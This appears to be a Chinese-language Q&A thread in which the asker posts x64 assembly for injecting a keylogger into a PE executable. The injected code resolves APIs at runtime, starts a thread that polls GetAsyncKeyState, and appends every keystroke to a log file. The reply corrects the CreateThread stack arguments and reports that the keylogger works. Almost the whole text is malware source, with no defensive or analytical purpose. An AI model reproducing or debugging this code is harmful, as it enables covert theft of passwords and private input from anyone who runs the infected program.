-1

我正在尝试将此代码注入 PE 文件以使用 CreateThread 运行我的程序以在 PE 文件中运行键盘记录器,但 CreateThread 失败并出现 3E6h ERROR_NOACCESS 错误。我在下面的源代码中的错误在哪里?

procedure:
sub rsp, 28h            
and rsp, 0fffffffffffffff0h     
lea rdx,[loadlibrary7]
lea rcx,[kernel32dll]
call MyGetProcAddress                

lea rcx, [user32dll]
call rax                


lea rdx, [createthread7]
lea rcx, [kernel32dll]
call MyGetProcAddress         
lea rbx,[pThread]                                                                                                    ;     

lea rbx,[ThreadId]
mov qword[rsp+20h], rbx
lea r9,[Par]
lea r8,[KL]
xor rdx,rdx
lea rcx,[SECURITY_ATTRIBUTES_]
call rax


add rsp, 28h            
db 0                    ;JMP PARA OEP
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0


proc KL
REPS:
lea rdx,[loadlibrary7]
lea rcx,[kernel32dll]
call MyGetProcAddress                

lea rcx, [user32dll]
call rax                

lea rdx, [getasync]
lea rcx, [user32dll]
call MyGetProcAddress         
MOV [GETKEYS],RAX

Label001:
mov [VIRTUAL_KEY_CODE],8
L0:
cmp [VIRTUAL_KEY_CODE],255
ja La1
mov rcx,[VIRTUAL_KEY_CODE]
MOV RAX,[GETKEYS]
call rax
cmp eax,-32767
MOV RAX,[GETKEYS]
jz Label1
inc [VIRTUAL_KEY_CODE]
jmp L0
La1:
mov [VIRTUAL_KEY_CODE],8
jmp Label001
Label1:

lea rdx,[loadlibrary7]
lea rcx,[kernel32dll]
call MyGetProcAddress         


lea rcx, [msvcrtdll]
call rax                


lea rdx, [fopen7]
lea rcx,[msvcrtdll]
call MyGetProcAddress                     

lea r8, [filemode]
lea rdx, [file_name]
lea rcx,[fp]
call rax                ;TO LOG KEYSTROKES

lea rdx, [fwrite7]
lea rcx,[msvcrtdll]
call MyGetProcAddress         


mov r9,[fp]
mov r8,1
mov rdx,1
lea rcx, [VIRTUAL_KEY_CODE]
call rax                ;TO LOG KEYSTROKES

lea rdx, [fclose7]
lea rcx,[msvcrtdll]
call MyGetProcAddress         

mov rcx,[fp]
call rax

jmp REPS
endp

proc MyGetProcAddress
...
ret
endp
kernel32dll            db  'KERNEL32.DLL', 0
loadlibrary7            db  'loadlibraryA', 0
user32dll              db  'USER32.DLL', 0
createthread7       db  'CreateThread', 0
msvcrtdll              db  'MSVCRT.DLL', 0
getasync                db  'GetAsyncKeyState', 0
fopen7              db  'fopen_s', 0
fwrite7             db  'fwrite',0
fclose7             db  'fclose',0
exitproc7           db  'ExitProcess', 0
filemode                db   'a',0
file_name               db   'log',0
pThread                 dq   0
struct SECURITY_ATTRIBUTES
A dd 0
B dq 0
C dd 0
ends
SECURITY_ATTRIBUTES_ SECURITY_ATTRIBUTES
GEYKEYS                 dq   0
VIRTUAL_KEY_CODE        dq   0
fp                      dq   0
Par                     dq   0
... 
4

1 回答 1

0

我已经初始化了我的源:

mov qword[rsp+20h], 0
lea rbx,[ThreadId]
mov qword[rsp+28h], rbx
lea r9,[Par]
lea r8,[KL]
xor rdx,rdx
lea rcx,[SECURITY_ATTRIBUTES_]
call rax

现在我的键盘记录器运行良好。谢谢你帮助我。

于 2017-03-19T17:34:47.560 回答